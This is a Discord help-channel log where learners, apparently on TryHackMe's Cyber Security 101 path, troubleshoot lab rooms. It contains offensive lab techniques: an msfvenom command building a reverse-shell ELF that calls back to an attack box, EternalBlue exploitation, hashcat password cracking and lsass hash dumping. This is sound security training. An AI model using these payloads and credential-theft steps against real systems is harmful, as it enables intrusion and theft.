#cyber-security-101-path

should it look like this?

Not like that

10.10.145.255 offensivetools.thm www.offensivetools.thm 🙂

it worked. thanks!

Keep up the good work 🙂

it seems like i have another problem :/

i dont understand why i can not get the other domains with this command

do you have a guess?

I had the same problem, since we only added 1 subdomain to the hosts file (www.offensivetools.thm). I fixed it by editing the /etc/resolv.conf file and setting the IP after nameserver to the IP of the DNS server

this routes all DNS requests via that nameserver

@rapid breach

Add -r <target-ip> to your command 🙂

Hi, I'm currently working on the Burp Suite: The Basics Room and a little stuck. I configured the settings of the Burp proxy according to instructions but am not able to record any HTTP responses. Any tipps?
("Intercept responses" is activated, as well as "or request was intercepted")

Can you provide a screenshot 🙂 ?

Sry but I neither can upload nor drag-and-drop the screenshot here somehow

😦

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

You will have to verify first 🙂

👍

I just get the requests somehow @woeful jungle

Disable Intercept option in Burp 🙂

It will block all the requests

Is it possible to have your progress reset to start over? I'm a returning user and am a little lost on where I left off. I know I can repeat the lessons, but my old answers are there.

As far as I know there's no such option 😦

No problem! I will figure it out. I appreciate the quick response KGB!

Maybe you could try to ask in #site-support 🙂

hey! there's a button right on the top of every rooms, I don't know if this is what you're looking for but it might help

You are a lifesaver! Thank You Keorra! I will try that when I get home.

Gave +1 Rep to @proven sierra (current: #2634 - 1)

my pleasure! (:

im having an issue in the gobuster: the basics room when i run gobuster its saying it is unable to connect i reviewed the file it had me alter in the begining but unsure why it is still unable to connect both att box and server still have time left on them

Try to add www.offensivetools.thm and offensivetools.thm domain to /etc/hosts

@kgb thx

i found where you recommened doing that for some one else and it working now

trying to the next question should it find the file quickly or will it take a little bit ? just wanting to if im doing it wrong not have to wait for the entire scan

It should take a few s , no more 🙂

@woeful jungle thank you

Gave +1 Rep to @woeful jungle (current: #2 - 2650)

Anytime buddy 🙂

an easier fix is to just edit the file /run/systemd/resolve/stub-resolv.conf using the same instructions given in Task 2. You don't even need to restart systemd-resolved for this to work.

or do this 🙂 because KGB solution will not work anymore when you have to do the gobuster dns command

they should definitely update the room if everyone is having trouble with it

Anybody doing Linux fundamentals rn?

Yeah , why 🙂 ?

I’m learning it right now and I was curious how you guys are practicing to really get it down

Each of these rooms has a practicing lab 🙂

I’m finished with all the tasks but I meant beyond that.

I don’t feel like I have it down just by doing that do you? I want to memorize it or be more familiar

You will use this in your everyday Linux life 🙂 .

I guess what I should be saying is does it matter if I’m kind of just breezing through these topics not necessarily remembering everything?

Yes , since you will use these concepts everyday you will definitely get used to them over time 🙂

Hmm. How much farther are you than me??

Well , I completed these linux rooms a few years ago and I can confirm it to you that you will use stuff from these rooms everyday 😄

You will get used to over time 🙂

Well both are true 😄

Both wrong, it's Certified Safety Professional 😄

Well just like any acronym it can mean a lot depending on the context 🤣

is metasploit this slow normally or is it because im connecting from far away

most of my commands are timing out

Are you using a VPN or the attack box

vpn

the attack box was usually so slow i couldnt even do a nmap

Next question, are you using a VM or running Linux as a live boot

kali vm on my linux, since i dont have msfconsole installed

I can’t speak for all, but in my travels with running Kali on a VM, the connections were always slow. Nmap and other scanners took FOREVER. I solved a lot of my issues by just booting Kali from a USB.

Now using a VPN to use any of the THM machines is remarkably quicker

hm maybe i should dual boot

dont really want kali as my main

What I do. Windows laptop with a dual boot Kali from USB

I agree on not using Kali as a daily but dual boot solves those concerns

anyways thanks

Gave +1 Rep to @fickle hedge (current: #2642 - 1)

Try to dedicate more resources to VM , I would recommend at least 4GB ram 🙂

Woohoo! My first rep haha

Taking notes is really helpful, then you have something to reference when they topic comes up again

Trying to get a metasploit reverse shell in Metasploit Exploitation task 5. I’m following the directions and manage to get a reverse shell, but not metasploit. The task requires me to be able to run a metasploit search command, which I can’t do

And now I can’t even exploit using a generic reverse tcp shell using the same parameter as the first time, which was successful

Figured it out. Reset to a new room. I guess maybe once you exploit successfully the first time, that’s it, no retrying anything else

that doesn't completely sound right. but depending on the exploit - some are pretty unstable and can break the environment

Make sure to select a meterpreter payload 🙂

That was it

Is everythong ok now 🙂 ?

Except for my brainfart when reading the next question which led me down the complete wrong wormhole? Yes. Everything’s good

Glad to hear that , keep up the good work 🙂

question

for rooms like hydra or burp where you have to go to the target machine ip on your web browser

how would you do that on vm?

there was nothing in that address when i tried on my kali

You can use AttackBox 🙂

no way to do it on the vm then?

You mean your own VM ?

yea

You will need to conect via VPN to THM network first 🙂

i already did so

but nothing was on the address

Can you provide a screenshot ?

hold up

oh nevermind it is working today

thanks anyway

Gave +1 Rep to @woeful jungle (current: #2 - 2783)

in this case though they dont provide the password list txt so i guess i gotta do it on the vm

nvm im supposed to use rockyou

You can install seclists on your machine using the following cmd 🙂
sudo apt install seclists

Why do some certs expire like CEH, NSE(Fortinet), etc.?

Because field constantly evolves and exams get updated accordingly 🙂

For john the ripper basics task 6,"...to crack /etc/shadow passwords, you must combine it with the /etc/passwd file for John to understand the data it’s being given."
the room doesnt really explain what it means to "unshadow" and combine the files for john, i dont understand why you would need to unshadow if you can crack the hashes from /etc/shadow, is it to match the hashes to usernames in /etc/passwd?

/etc/passwd contains some other info needed like uid,gid,sometimes cleartext passwords,etc. 🙂

"unshadowing" is combining the hash on the same line as the username to make it easier for john right?

Yes 🙂 . we get hash from /etc/shadow and other necessary from /etc/passwd 🙂

is the uid and gid usually a string or like a string of numbers

number 🙂

This kind of seems like i should start with the metasploit modules first?
https://gyazo.com/89bc5e9af09d9cb10c20e10fca4176f6

Yeah , you can skip moniker for now and return to it later when you finish metaspolit 🙂

how can I RDP into a windows machine to do the AD tasks?

You can use remmina or xfreerdp , just type one of that in the terminal to use it 🙂

thanks

Gave +1 Rep to @woeful jungle (current: #2 - 2943)

is it possible to connect from the attackbox?

I have to set up for that. I wound up RDPing from the windows machine into itself.

Yes it is 🙂

What do I put on the remote desktop connection? i cannot figure it out ffs

thm\username I think it was, hold on let me check

Note: When connecting via RDP, use THM\phillip as the username to specify you want to log in using the user phillip on the THM domain.

https://gyazo.com/10669c8df7c1d496bbaea1de3e28c97e

the text is too small for me

@fallow cradle

Done!

try the ip address at that part

also says it couldnt find the computer "TMH"

and no username

use IP address

ye ill try

damn, its the target ip, which makes sense but its so confusing the text

thank you

no problem, glad you got in

You can also use xfreerdp if you're having trouble with remmina 🙂

the thing is that the vm they give for the exercise has windows

You also need to rdp as different user

i think thats why i wasnt able to use those

ye already got that part, just had to put the target machine's IP

thank you anyways

So , everything is ok now 🙂 ?

yes i got it

Great job , keep going 🙂

the lesson owasp attack ssrf the adress ip is already it's normal but why i can't connect me ?

which room, task are you doing?

owasp top 10?

a few moments later

the machine take 10years

try to find from where the site is trying to download things first

with nslookup

I've just finished the path and I'm very happy. Now I'm going to start the Path Jr Penetration Tester

Congrats , great job 🙂 🚀

Thanks 😃

Gave +1 Rep to @woeful jungle (current: #1 - 3442)

HI, I have to enter an IP address in a defanged format, can somebody maybe tell me what that means exactly? I have no clue unfortunately...

You can use CyberChef to do so , just select Defang IP option

basically it will wrap . with [] Ex: 111[.]111[.]111[.]111

Ah, now I understand! Thanks very much!

in the Networking Secure Protocols room, the last task it cointains says to look for some login logs on wireshark, already found the POST, however the size of the password i found ("thm&pass=THM%7BB8WM6P%7" (which i assume it reads "THM{BB8WM6P}")) doesnt match the size of the required awnser, am i missing something?

the max input i can awnser is "THM{BB8WM6}" and its wrong

First b in your answer is actually part of encoded { - %7b , remove it
THM{B8WM6P}

thank you!

Gave +1 Rep to @woeful jungle (current: #1 - 3528)

i have another question, kind of unrelated

do you recommend anything i could do to put to use my (basic) linux skills to use so i can gain some memory on the commands and actually use them for a bit?

i have a linux terminal installed and everything, i just dont know what to actually do with it

You can check out Linux module 🙂
https://tryhackme.com/module/linux-fundamentals

Hi,

In Active Directory room in the Task 2, is it possible to connect to the machine via RDP from our own local machines?

Can we use the following creds?

• Computer: THM_MACHINE_IP
• Username: THM/Administrator

Yes , you can but you don't necessarily need to , you can use machine in spilt screen view

Yes you are right but I just wanted to try it out of curiosity. However, when I try to connect I am getting an error

You need to THM network via vpn beforehand

Got it, thank you!

Gave +1 Rep to @woeful jungle (current: #1 - 3550)

hi, what is the required DNS setup in https://tryhackme.com/room/gobusterthebasics, if I'd like to perfom it from my local, VPNed, Kali on WSL2?

the same way you set any dns on windows basically... but would highly recommend a full vm in virtualbox or vmware instead of wsl2 due to wsl2 being messy with its networking part

Do you experience any error or ?

In the networking essentials room, task 6, last question pretty much asks how many thousand tcp ports there are.

Iirc there are 65535. However the answer is 65. Why is it not 66 after rounding?

Well , good point 🙂

Now that I think of it, maybe they mean the ports that can be used? By that I mean 65535 - common ports that can not be used

yes, I do. Gobuster cannot find the domain name, and I cannot modify the dnsmasq in the WSL2 Kali. So I was hoping for other hints that could help me use my client

Try not to use WSL , many users reported connection problems with THM network while using wsl . Try to install vm if possible

I can't find subdomain in gobuster, I think the syntax is fine

└──╼ #gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     offensivetools.thm
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2025/03/06 05:55:27 Starting gobuster in DNS enumeration mode
===============================================================
                              
===============================================================
2025/03/06 05:55:47 Finished
===============================================================

└──╼ #cat /etc/resolv-dnsmasq
nameserver 10.10.23.73

└──╼ #cat /etc/hosts
# Host addresses
10.10.23.73    offensivetools.thm
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters

already tried to edit /etc/hosts to www.offensivetools.thm too

Can you provide a shot of /etc/hosts 🙂 ?

Ummmm it's right on the end of codeblocks

Its 10.10.23.73 offensivetools.thm

Already tried with www.offensivetools.thm too but the results are same

This is the ip of target machine , right 🙂 ?

Yes, i can confirm this is the target machine

Try to add -r 10.10.23.73 to your command then

Okay, thanks 👍

Does it work now ?

hi there, just finished the path, super excited and i am trying to acces my certificate, when i click on view certificate it takes me to a new tab where it partially loads the certificate without any of the fields being completed to then ultimately fail to load and fetch a 500 internal server error response. Anything i can do? should i just wait for a bit until this is fixed? thank you!

It's a temporary problem. Try again a bit later , be aware that name on the certificate can't be changed once it is generated 🙂

got it, thank you! yes, have my actual name in there hehe

IT IS ! THANKS ! 👍 👍

└──╼ #gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -r 10.10.147.166
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     offensivetools.thm
[+] Threads:    10
[+] Resolver:   10.10.147.166
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2025/03/06 14:29:35 Starting gobuster in DNS enumeration mode
===============================================================
Found: www.offensivetools.thm
Found: forum.offensivetools.thm
Found: store.offensivetools.thm
Found: primary.offensivetools.thm
                                 
===============================================================
2025/03/06 14:33:06 Finished
===============================================================

Gave +1 Rep to @woeful jungle (current: #1 - 3739)

Hi! I'm looking for some help with the Metaspoloit: Exploitation room. I've tried following along with walkthroughs and I'm hung up in the same spot every time. I made the payload with msfvenom, start the server on the attackbox, download the .elf file on the target machine, chmod to allow execution priviledges, START a meterpreter session on the attackbox, run the .elf on the target machine.... and then it all falls apart.
I get this: meterpreter >
[*] 10.10.219.189 - Meterpreter session 1 closed. Reason: Died

Start attackbox in full screen mode and use target in split view mode both machines should be active at the same time 🙂

Yes. Okay, this makes sense. Thank you!!

Gave +1 Rep to @woeful jungle (current: #1 - 3848)

How important is it to know the math behind Cryptography? I am just worried because I did the first walkthrough of the "Cryptograthpy" room (cryptography basics) and I just don't get the mathmatics (I am not great at maths)

Eh, you can get a lot done with the math black-boxed. I don't really know much about it beyond "factoring large numbers is hard", "discrete log is hard", and "discrete log on elliptic curves is harder". Didn't stop me from doing what I needed to do at the sysadmin/break-fix/firewall-support level of things. I'm sure there's some point where it would be beneficial to really grok the math of it, but for the most part, it's a concern for the people who are compartmented off in their own little segment of the industry where they write crypto algos/libs IMO

From a penetration standpoint, finding vulnerabilities through pure cryptanalysis is to finding vulnerabilities in implementation as lock-picking is to bypass techniques. Cool and impressive and probably fun, but practically speaking, not as much of a thing.

Thank you, appriciate the input. I gave it one look and was like "holy shit if this is a key part of cyber then I am screwed" - I mean of course it is still important but I guess in some real job situations it isn't as important (depending what you do I suppose)

Gave +1 Rep to @lethal light (current: #245 - 31)

I'll still try learn and understand it but good to know it shouldn't matter too much if I find it hard

I will contuine here

which part are you having difficulty with specifically

the stuff in that room are the very basics, so i would recommend at least learn the basics

Mainly the math itself, I get the concept and how it works but when I starts throwing math at me

i've had similar issues when i was doing the room

if you tell me exactly how much of the math part you can understand, and what you can't understand, i can send you alternate resources that explains it better

https://youtu.be/Pq8gNbvfaoM?si=xS7dg01xZRQ0jSdy
https://youtu.be/KXq065YrpiU?si=eUFsNbKzWW8sdJXC
if you can't understand the math behind RSA and DH key exchange specifically, i would suggest going through these videos

@hot rivet

Thanks, on my way back from London so I'll take a little look when I'm back:)

Really appreciate it

30% done 😤

Trying to find the aliens name in the wire shark module but I have no idea how too 😭😭

Never mind I got it

W

Hey guys, on room "Metasploit: Exploitation" currently using the MS17-010 exploit remoting onto the device. I am trying to change directory but I have no clue why I cannot. I try and it just enters a new line below my command which allows command input but then doesn't do anything? Little lost

It's a Windows machine use cd C:\ 🙂

I tried that too 😭

dude use \

double \

for some reason discord is hiding it.

Ah that works

cd "C:\"

put path in quotes

AH that's why, thanks both makes much more sense

well thanks . i got something new to learn.

Gave +1 Rep to @woeful jungle (current: #1 - 4148)

Yeah \ is treated as special character ( string terminator - it will terminate the string ) . If we add \ before \ so \\ or put it in quotes we're treating it as literal string 🙂 @thick stump @hot rivet 🙂

Hello guys, I have a question about the Cybersecurity 101 path. I realized that this path teaches you a little about many topics. What I want to know is: should I research and dig deeper into these topics, or should I just keep moving forward and complete the entire path first?

Hey,i am going with learning basics first , then completing it and going advance in some topics and tools like wireshark ,burp suite and nmap.Then i will dive in Jr. penetration path.

Keep going for now , you will repeatedly use those techniques on your journey 🙂

Oh nice, That’s a good idea. Thanks, and good luck to you 🙂

Gave +1 Rep to @thick stump (current: #2771 - 1)

Ok thanks! I will keep going.

good luck mate.

why is my path not updating its % when I finish a room in Cyber Sec 101?

Try to report it in #1333993673381253162 😦

In the mean time , try to restart room progress , leave the room and re-join. Then complete tasks again , maybe it will help

boutta begin the pentester path now that I finished cyber sec 101

Congrats on completing Cyber101 🙂 🚀

I’m trying to answer a question in the SQL fundamentals room but it’s saying unauthorised when I submit my answer

Which question and what is your answer ?

It was the flags for task 4 but I fixed it

I had to log out of my account then log back in

Ive been away for a while, and now that Im back, the website is trying to play me:

Get-command instead of find-module 🙂

Thanks

Gave +1 Rep to @woeful jungle (current: #1 - 4329)

haha i had a problem with the same question today 😄

Is it just me or is the Cryptography course on TryHackMe kinda hard?

New crypto rooms or ?

Public Key Cryptography Basics walkthrough.

It is going to be hard if this is the first time you're learning this concept 🙂

Don't worry for now

Yeah, it's the first time for me.

Then it is ok 🙂 . Take your time and re-read lesson a few times , crypto is a more advanced concept , it is normal if you don't get everything straight away 😄 .

Ok, thanks.

Gave +1 Rep to @woeful jungle (current: #1 - 4378)

Thought id add this in here for anyone stuck on the "Networking Core Protocols" telnet portion like I was. You need to double click enter to actually send the telnet request and not have it timeout

Actually had to use chat GPT to help walk me through what my incorrect input was.

Yeah doube click is used to send a request , one click is used to add a new line 🙂

my god, I've just finished the active directory "basics" room which is classed as Easy and 30 minutes! I must have spent about 4 or 5 hours working through that!

Congrats , great job 🙂 🔥 🚀 . Don't pay attention to that timer it isn't accurate

Don't worry about the time frame, as long as you walked away with understand thats all that matters. I reckon there are many people who are primarily doing the lessons for the dopamine of completing something, but may not fully grasp the concepts and carry on regardless

You are probably saving your future self some time!

Yeah I made extensive notes and grasped the concepts. I doubt I'll remember the detail so much given it's a platform I never use.

Where can I read more about the "Moniker Link (CVE-2024-21413)" ?
I want to know more about it. 🙂

Here 🙂
https://tryhackme.com/room/monikerlink

I used same tool on binary but had other imphash value

Really struggling with Public Key Cryptography Basics - is this normal? Struggling to make sense of the math, does anyone have any resources that can help explain this? My brain is melting rn

Yeah , crypto is a more advanced topic. It's ok if you don't get it at first 🙂

Thanks. I don't suppose there's a room that will break it down further than this one that I can check out? I'm stuck on this one at the moment

Gave +1 Rep to @woeful jungle (current: #1 - 4555)

I will check out later if Crypto 101 is still available and will send you a link if it is 🙂

Appreciate you! Thanks dude.

Gave +1 Rep to @woeful jungle (current: #1 - 4556)

https://tryhackme.com/room/encryptioncrypto101
Also check this calculator, it gives you clear explanation how it got the result 🙂
https://www.irongeek.com/diffie-hellman.php

Good day everyone I am currently in the cybersecurity 101 and module ACTIVE DIRECTORY in TASK 4

according to the screenshot here, I need to enter Claire previous password which wasn't provided

I (Philip) was delegated ability to changed her password which I did,

Now I need to login into her account with the new password but the old one is being demanded

Where can I find it pls

Pls what am I expected to do

i used windows RDP to try logging in her account and as for the passowrd input.. i used the NEW PASSWORD... then FOR NEW PWD input i still used the new password which is Asdf123456@ now it says the passowrd isnt complex...is there any requirement for the password lenght or character??

Try making a password the same length as Claire2008

That should work hopefully.

ok thanks

i even checked the GOP (default domain policy) for the THM domain for computer configuration and minimum lenght was 10 ,max was unlimited

will try ur solution too

will try your solution too

Windows Powershell Task 4.

should the answer not be: get-content -path c:\users?

nvm

I thought it was a file, not a directory, my bad.

try with get-childitem

yes I solved it , I was mis reading it

was using get-content instead of get-childitem 😛

this one bugged my brain, as in the attackbox it did not show the answer

look at the last column on the right

yes, but one expects it to also appear in the PS in the attackbox

Try to use it in full-screen mode

Jesus. I am stupid

Thanks 🙂

Gave +1 Rep to @woeful jungle (current: #1 - 4581)

does it appear now ?

yes pahahaha

in http(s) accessing the web section in Networking core protocol room, required to access the server using telnet and get the flag.html file, and when writing telnet [ipaddr] it requires to login using user and password, am I missing something here?

ok I found my mistake thx anway :)))))))))

add port 80 to your command

how long is this supposed to be running for

maybe up to a 5min

anyone can help me find the login credentials using wireshark? network security protocols room

What are you trying to do 🙂 ?

I configured wireshark to use the ssl-key so it can decrypt the data, but I can't find the credentials

Follow streams

You can use search bar when you follow the streams to search for some interesting keywords

Try to search for strings like password 🙂

found it thanks 🙂

Gave +1 Rep to @woeful jungle (current: #1 - 4594)

Am I missing something? I can't find the correct answer for this

god never mind, the answer is above those 2 terminal examples

Networking Secure Protocols. task 8 closing notes.
The room asks me to find the password in a Wireshark packet. But I have been given any explanation on how to use wireguard before

what am I supposed to be looking for?

import decryption key first

I have done this like the guide says, but I am not sure how to find the password

there are a lot of lines

Check this message , we already talked about it today 🙂
#cyber-security-101-path message

Thank you

Gave +1 Rep to @woeful jungle (current: #1 - 4601)

Hello, I want to ask in metasploit: exploitation room

Based on introduction task, wordlist locating in directory /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt but I can't found it. Where is the wordlist file exactly?

It is in a different place on Kali

find / -type f -name MetasploitWordlist.txt 2>/dev/null

Hmm still can't found it, I will change to another one

Ok positive, thank you

Try to cat it on AttackBox and copy contents to your machine

having an issue at the module active directory basics,task 4. when i want to follow the example from the task,and set up a password for sophie,it gives me an error,i am logged in as Phillip in powershell,via RDS.

this is the issue.what am i doing wrong ?

no matter the pass i put in there,it's the same error

If it’s a complexity thing make sure you have a capital letter, lower case letter, and numbers. If I remember correctly it has to be 10 characters long because a previous task in there has you set the minimum length to 10

I had issues with that one as well and it took some playing around to get it to cooperate

I will try again tom. I was in the browser studying for 8 hours straight. My eyes are bleeding. Break for now. Going back tomorrow.

But thanks for the tip. Also special characters are ok ? Like @ for example ?

Sometimes a break is the best thing. I didn’t use any special characters in mine. Keep it simple with something like Pizzaslice2004 or Itisraining1899.

hello guys

why nano is such an douche with me ? i am doing the task 5 in linux shell, the locker script. i know the answer already cause i did the script. the issue is that i cannot go back to shell to actually execute the script. i save it,chose exit,and i am still in nano,but with shell prompt....and when i am trying the command to execute the script i just did,it says permission denied

issue at hand

You missed a step after exiting nano. You need to chmod +x to give the script permission to execute before trying to execute. Also check that it is saving properly in nano

Am I missing something from hashcat exercise? trying to find the password. Will I have to wait for it to finish? may take some hours

Which room , which question ?

Hashing Basics Room, Task 6

what is your hashcat cmd ?

hashcat -m 25600 -a 0 hash1.txt /usr/share/wordlists/rockyou.txt

Hm , have you tried to use some online tool like hashes.com ?

was trying to avoid it, but I guess I will use it

I think that one of the tasks from the room specificly requires online tools maybe this is the one

hmm, the second exercise worked in the terminal. was instant almost

yeah but room creator maybe purposely choose word that's not present in rockyou.txt for this task

interesting exercise though

@woeful jungle

Thanks

Gave +1 Rep to @lunar coyote (current: #1860 - 2)

In the room Moniker Link (CVE-2024-21413)
did anyone attempt to crack the netntlmv2 hash? I tried johntheripper and hashcat with rockyou.txt, but no luck.

Try to use some online tool like hashes.com

I did. No luck. Maybe it's actually a good password

Hello, why I'm getting's all these passwords ? I found the second flag with ssh but the first one it seems there is a problem

room hydra

ok I dont no what happen there but I restart the target machine and now I got the password

that was wierd

Hello everyone, I would like to know if I'm the only one to have bugs with the "Pratical Task" in "Shell Overview". For me, i'm trying to do a reverse shell for the first question and when i catch a connection from the server, i cannot do anything. It's like i don't get any response from the server. i checked a video and I did the same thing.

Can you please verify and provide a shot 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

That's it

Try to use higher port number

i tried with 556, 4558, 8081 and same thing

Try with 4444 . Also add ; before and after your cmd

Well i just restarted the server and it seems work

And thanks for the support @woeful jungle

Gave +1 Rep to @woeful jungle (current: #1 - 4749)

Hello,

In the Windows PowerShell room, specifically under task 7, I need to determine the hash of the hidden treasure (big-treasure.txt) that was discovered earlier. However, when I generate its hash using Get-FileHash and submit the result, the answer doesn't seem to be fully accepted.

Could I be overlooking something, or perhaps using the wrong file?

Can you provide a shot please ?

Of course, here

For some reason it doesn't show the full hash, and ends it with ...

Expand that window or save output to a file 🙂

Tried expanding the window but it doesn't work for some reason

I will try saving it in a file

add -o <file-name> to your cmd

Doesn't recognize the -o option

Try to pipe this | Out-File <file-name>

Same results

Set higher resolution in remmina's settings . Output is too long and it gets truncated or try to open that file with notepad 🙂

Worked, thank you!

Gave +1 Rep to @woeful jungle (current: #1 - 4751)

its not just me the aswer is not listed right

nevermind dident put port number

You could add a suggestion for it on #feedback-and-ideas (to have a separate username and certificate name).

Is there a way to change the name in the cert?

not afterwards. You have to enter the name beforehand

Damn, I hope they will add a way to change the name in the cert.

same. or that they dont show the real name in the dashboard, so we dont have to change it

Yeah true.

The powershell module the third section "Powershell Basics" and the first question "How would you retrieve a list of commands that start with the verb Remove? [for the sake of this question, avoid the use of quotes (" or ') in your answer]"
I'm trying to solve it with "Get-Command -verb remove*" and I get an error. The characters match the answer and on my own machine the command works as specified in the question. Kinda puzzled am I.

Try contacting our support about it. Not certain but if anyone can help they can.

Thanks must do that but it's past midnight here. I think I better get some sleep and contact the support later today.

Try to use Get-Command -Name Remove*

Thanks. Seems like I was thinking too fancy like Remove is a verb and since the Powershell documentation specifically filters verbs and nouns separately with different arguments I got stuck. Happens to me all the time. The frustration factor kicked in when the actual command worked in powershell and not in THM. Reminds me my old now late professor who said that when the terrain and map differ, trust the terrain.

Hello everyone, do I need to have some web programming knowledge before going for this walkthroughs?

If you are a beginner, it's better to know a little about variables, data types, and functions in JS and HTML + JS integration, but for web app basics, it's not needed.

I tried like that as a beginner but the rooms are well explained...!!!!

No , these rooms are very beginner friendly 🙂

I tried like that as a beginner but the rooms are well explained...!!!!

Okay, thank you. I already want to learn web programming, so I think it's the right time to start.

Gave +1 Rep to @kind plank (current: #2854 - 1)

Oh nice, I will finish them first and then start with web programming.

welcome... you can do both of them now its not a big deal for you, i think!!!

If you're interested in learning js , you can check out freeCodeCamp on YT . It's a really great free learning resource for coding 🙂

Hi

In the Networking Secure Protocols Room, Closing Note, is there an optimized or smarter approach to locating the password within a packet? Or is the only reliable method to check packet 366, as suggested in the hint?

follow streams and use search function within the stream

Got it, will give it a try. Thanks!

Gave +1 Rep to @woeful jungle (current: #1 - 4830)

Managing Users in AD
I joined as Sophia, but I don't see any flag on my desktop

Can you please verify and provide a screenshot ?
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

go to sophies desktop folder

you're in tmp folder now

Thanks, I found it.

Gave +1 Rep to @woeful jungle (current: #1 - 4831)

So.. I am doing Networking and I feel like I've seen almost all of these in PreCyber is there anything I should revisit?

Yeah , revisting is really important especially when you're on beginning of your journey 🙂

Thanks!

Gave +1 Rep to @woeful jungle (current: #1 - 4832)

I also revisit old lessons when i'm stuck in some ctf ( which is really often btw 🤣 )

Hey

In the Hashing Basics room, Task 6 first question, when I try to run the hashcat I didn't get any results. Here is the command: hashcat -m 3200 -a 0 hash 1.txt /usr/share/wordlists/rockyou.txt

Am I using any wrong parameters?

Can you send a screenshot of the question?

Here

Your syntax looks correct, so it’s probably the hash type that needs to be adjusted. Confirm you’ve got the right one again

$2a$06 is bcrypt, right?

Yes

Sorry reread your first screenshot, run the same command with - - show to show the password

Yea it worked, thank you!

Gave +1 Rep to @willow isle (current: #1419 - 3)

Glad it worked! Sorry for the roundabout!

No worries, you helped a lot

What hash type is this?

Should be sha512crypt since it starts with $6$

do you know what could be the -m value?

I tried 1700 and 1720 for sha512 but it is showing no hash loaded or separtor unmatched

you can find mode options for hashes on hashcat's website 🙂
https://hashcat.net/wiki/doku.php?id=example_hashes

It was 1800

Thank you

Gave +1 Rep to @woeful jungle (current: #1 - 4880)

Good day everyone, currently in Moniker Link (CVE-2024-21413) TASK 3 EXPLOITATION Insruction says Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our AttackBox which i did by chcecking th AttackBox IP which is 10.10.167.99 After successfully sending message to the victiom by running the python script, I click on the link in my inbox but i get error according to the screenshot below saying ** we cant find '\10.10.197.99\test!exploit' pls make sure u are using the correct web address** Kindly check my script if i am not linking the IP address well... This is my script content ```

its showing // as \ in the error

Hello everyone, a question for the nmap basics room why is it not scanning its stuck at 83%

nevermind it worked

looks fine to me , be patient scans can take a few minutes 🙂

That pop up showed for me. Go back to the terminal running responder and the hash value should be there.

Hello everyone , i am in metasploit:Exploitation task 5.. for question 2 What is the content of the flag.txt file? used the **exploit(windows/smb/ms17_010_eternalblue) ** Then a payload generic/shell_reverse_tcp used my machine 1P as RHOSTS ....says target is not vulnerable but the hint states The target is missing the MS17-010 patch

use meterpreter not generic payload

okay

switched to (windows/x64/meterpreter/reverse_tcp) still not vulnerable

You're probably using wrong machine then , terminate machine from task 3 and start machine directly from task 5 . These are two different machines

ok

noticed whn i click start machine in task 5, other machines in task 3 and 7 buttons are also disabled, as if i pressed them

yeah , that's intended bahavior

sucessfully established a session, thank u

Yeah , scan can take up to 10-15min even on AttackBox

That also depends on the flags that you're using and on the actual target . There's no universal answer to that question 🙂

So I've just finished Metasploit: Exploitation room and it bamboozled me a bit! I really struggled initially with being asked questions on Meterpreter when that's the next room! I don't know if the order is right or whether I was just too slow 😄

It is a broad topic. It is ok if everything doesn't fall in place after one room 🙂 . Keep up the good work 🙂 👍

thanks yeah I got there in the end!

Gave +1 Rep to @woeful jungle (current: #1 - 4938)

Hey guys i am 50 % completed of the 101 cyber security, i wondered if i can start to do some challenges now, what do you think

You know, it's funny, I was literally just coming here to ask the same thing haha. I'm 65% completed on the path

I can relate, I definitely will need to re-visit those rooms at some point once I finish the learning path haha

I would recommend you to complete that path first before starting with challenges

I was thinking that was probably the case, I've tried a couple recently and was pretty lost on portions of them so far

METASPLOIT MSFVENOM TASK...The elf file generated looks somehow when i check the content downloaded on my target machine thereby not making the file executable . Below is the text and screenshot...first is the downloaded shell.elf file on my target machine second is what it originally looks like when geenrated on my attackbox After running my handler, i proceeded to execute on my target machine to get a meterpreter session but its says error of $ ./shell2.elf
./shell2.elf: 1: j: not found
./shell2.elf: 2: ^1SCSjf[h: not found
./shell2.elf: 4: Syntax error: Unterminated quoted string*

im having a very hard time on Vulnerability Scanner Overview i cant use the weblink can somone from staff review this please as its hard to pass

wdym , can you provide a screenshot please 🙂 ?

Okay perfect thank you

Gave +1 Rep to @woeful jungle (current: #1 - 4958)

I am new to discord. what does that mean

That's a bot giving rep , usually when somebody says thanks to somebody 🙂

Gave +1 Rep to @hollow leaf (current: #2891 - 1)

Good day everyone, pls can someone help me out 🙏🙏🙏

I had trouble with that one. Are you creating your elf file correctly?
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=AttackBoxIP LPORT=XXXX -f elf > rev_shell.elf
I think I set the LPORT to 4444

Then in Metasploit; use exploit/multi/handler but crucially with the correct payload and setting the LHOST and LPORT to whatever your attack box is and the port you setup in elf creation?
I think the payload is what tripped me up - I used the default but had to change it to the reverse_tcp one to get it working.

Oh and I had to have the VM open in a different window because every time I flipped between the attack box and the VM in split screen mode; it would reset my bash cli in the VM

Ok thanks.. will check my file creation again

Gave +1 Rep to @faint crystal (current: #2891 - 1)

🔴🔴🔴🔴🔴

hi everyone ... Currently in meterpreter last task, tyring to get the NTLM HASH of the target machine... After migrating to the lsass.exe process id , i run the command hashdump and the session always gets terminated as soon as i type hashdump i dont understand why.. i used getuid to check my user priviledge and i have a SYSTEM PRIVILEDGE so defintely i am okay to run the hashdump command but it always closes when i do... itied increasing the session timeout, still not solved....pls what can i do

tried using a post module on the session instead of the ** hashdump command** and still error **post(windows/gather/hashdump) **

